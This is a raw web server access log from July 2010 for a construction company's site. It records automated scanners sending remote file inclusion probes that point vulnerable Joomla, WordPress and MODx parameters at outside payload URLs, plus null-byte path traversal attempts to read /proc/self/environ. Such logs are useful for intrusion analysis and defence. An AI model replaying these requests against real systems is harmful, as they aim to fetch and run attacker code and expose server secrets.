203.251.80.167 - - [01/Jul/2010:01:35:39 -0700] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
121.254.172.27 - - [01/Jul/2010:01:38:42 -0700] "GET /logs/access_100531.log/errors.php?error=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:01:39:04 -0700] "GET /logs/access_100601.log//?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:01:39:05 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:01:39:06 -0700] "GET /logs//?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1372 "-" "libwww-perl/5.79" "www.de-construction.com"
93.186.192.124 - - [01/Jul/2010:01:40:24 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [01/Jul/2010:01:40:24 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [01/Jul/2010:01:40:24 -0700] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
121.254.172.27 - - [01/Jul/2010:01:40:34 -0700] "GET /logs/access_100601.log/errors.php?error=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.251.80.167 - - [01/Jul/2010:01:48:20 -0700] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
69.175.94.58 - - [01/Jul/2010:01:51:06 -0700] "GET /logs/access_100601.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=ftp://66.210.47.200/v6id.exe??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.de-construction.com"
69.175.94.58 - - [01/Jul/2010:01:51:06 -0700] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=ftp://66.210.47.200/v6id.exe??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.de-construction.com"
69.175.94.58 - - [01/Jul/2010:01:51:07 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=ftp://66.210.47.200/v6id.exe??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:01:51:42 -0700] "GET /logs/access_100601.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:01:51:46 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:01:51:51 -0700] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
78.110.50.120 - - [01/Jul/2010:01:52:42 -0700] "GET /////write_comment_update.php?board_skin_path=http://www.coprodeliusa.org/flatcms/.lkt1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
78.110.50.120 - - [01/Jul/2010:01:52:43 -0700] "GET /logs/access_100501.log//////write_comment_update.php?board_skin_path=http://www.coprodeliusa.org/flatcms/.lkt1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
78.110.50.120 - - [01/Jul/2010:01:52:43 -0700] "GET /logs//////write_comment_update.php?board_skin_path=http://www.coprodeliusa.org/flatcms/.lkt1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:01:52:47 -0700] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:01:52:47 -0700] "GET /logs/access_100601.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:01:52:47 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:01:52:53 -0700] "GET /index.php?option=com_bayesiannaivefilter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:01:52:59 -0700] "GET /index.php?option=com_bayesiannaivefilter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.de-construction.com"
203.251.80.167 - - [01/Jul/2010:01:56:39 -0700] "GET /logs/access_100601.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.251.80.167 - - [01/Jul/2010:01:56:39 -0700] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.251.80.167 - - [01/Jul/2010:01:56:40 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:01:58:14 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:01:58:14 -0700] "GET /logs/access_100601.log%20%20//Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:01:58:14 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:01:58:24 -0700] "GET /logs/access_100601.log%20%20//Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:01:58:24 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:01:58:26 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:01:58:28 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:01:58:46 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:02:05:02 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
114.108.151.149 - - [01/Jul/2010:02:05:33 -0700] "GET /logs/errors.php?error=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
114.108.151.149 - - [01/Jul/2010:02:05:34 -0700] "GET /errors.php?error=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:02:07:24 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.251.80.167 - - [01/Jul/2010:02:08:12 -0700] "GET /logs/access_100601.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.251.80.167 - - [01/Jul/2010:02:08:13 -0700] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.251.80.167 - - [01/Jul/2010:02:08:13 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:02:14:57 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:02:14:57 -0700] "GET /logs/access_100601.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:02:14:57 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:02:15:06 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:02:15:06 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:02:15:06 -0700] "GET /logs/access_100601.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:02:17:46 -0700] "GET /logs/access_100601.log//index.php?option=com_bayesiannaivefilter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:02:17:47 -0700] "GET /index.php?option=com_bayesiannaivefilter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:02:17:47 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.de-construction.com"
194.65.225.58 - - [01/Jul/2010:02:22:04 -0700] "GET /logs/scripts.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
194.65.225.58 - - [01/Jul/2010:02:22:04 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
194.65.225.58 - - [01/Jul/2010:02:22:04 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:02:22:33 -0700] "GET /logs/access_100601.log//index.php?option=com_bayesiannaivefilter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:02:22:34 -0700] "GET /index.php?option=com_bayesiannaivefilter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:02:22:34 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.de-construction.com"
194.65.225.58 - - [01/Jul/2010:02:24:22 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
194.65.225.58 - - [01/Jul/2010:02:24:22 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
194.65.225.58 - - [01/Jul/2010:02:24:22 -0700] "GET /logs/access_100601.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
194.65.225.58 - - [01/Jul/2010:02:24:41 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
194.65.225.58 - - [01/Jul/2010:02:24:41 -0700] "GET /logs/access_100601.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
194.65.225.58 - - [01/Jul/2010:02:24:41 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:02:25:06 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:02:25:06 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:02:25:06 -0700] "GET /logs/access_100601.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
113.30.66.24 - - [01/Jul/2010:02:26:04 -0700] "GET /errors.php?error=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
113.30.66.24 - - [01/Jul/2010:02:26:10 -0700] "GET /logs/access_100601.log%20%20/errors.php?error=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
113.30.66.24 - - [01/Jul/2010:02:26:10 -0700] "GET /logs/errors.php?error=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
113.30.66.24 - - [01/Jul/2010:02:26:17 -0700] "GET /errors.php?error=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
113.30.66.24 - - [01/Jul/2010:02:26:23 -0700] "GET /logs/errors.php?error=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
113.30.66.24 - - [01/Jul/2010:02:26:23 -0700] "GET /logs/access_100601.log%20%20/errors.php?error=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
194.65.225.58 - - [01/Jul/2010:02:28:35 -0700] "GET /logs/access_100601.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
194.65.225.58 - - [01/Jul/2010:02:31:53 -0700] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:02:32:20 -0700] "GET /logs/access_100601.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:02:32:20 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:02:32:20 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
194.65.225.58 - - [01/Jul/2010:02:34:10 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
125.141.91.138 - - [01/Jul/2010:02:37:12 -0700] "GET /logs/access_100531.log//main.php?_zb_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
194.65.225.58 - - [01/Jul/2010:02:37:54 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
194.65.225.58 - - [01/Jul/2010:02:37:54 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
194.65.225.58 - - [01/Jul/2010:02:37:54 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
194.65.225.58 - - [01/Jul/2010:02:37:54 -0700] "GET /logs/access_100601.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
110.45.140.231 - - [01/Jul/2010:02:42:49 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
110.45.140.231 - - [01/Jul/2010:02:42:49 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
110.45.140.231 - - [01/Jul/2010:02:42:49 -0700] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:02:43:06 -0700] "GET /logs/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:02:43:07 -0700] "GET /logs/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:02:43:07 -0700] "GET /*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:02:43:07 -0700] "GET /logs/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:02:43:07 -0700] "GET /*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:02:43:07 -0700] "GET /*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:02:44:10 -0700] "GET /logs/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:02:44:11 -0700] "GET /*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:02:44:11 -0700] "GET /logs/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:02:44:11 -0700] "GET /logs/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:02:44:11 -0700] "GET /*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:02:44:12 -0700] "GET /*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
193.231.187.33 - - [01/Jul/2010:02:44:16 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.de-construction.com"
193.231.187.33 - - [01/Jul/2010:02:44:16 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.de-construction.com"
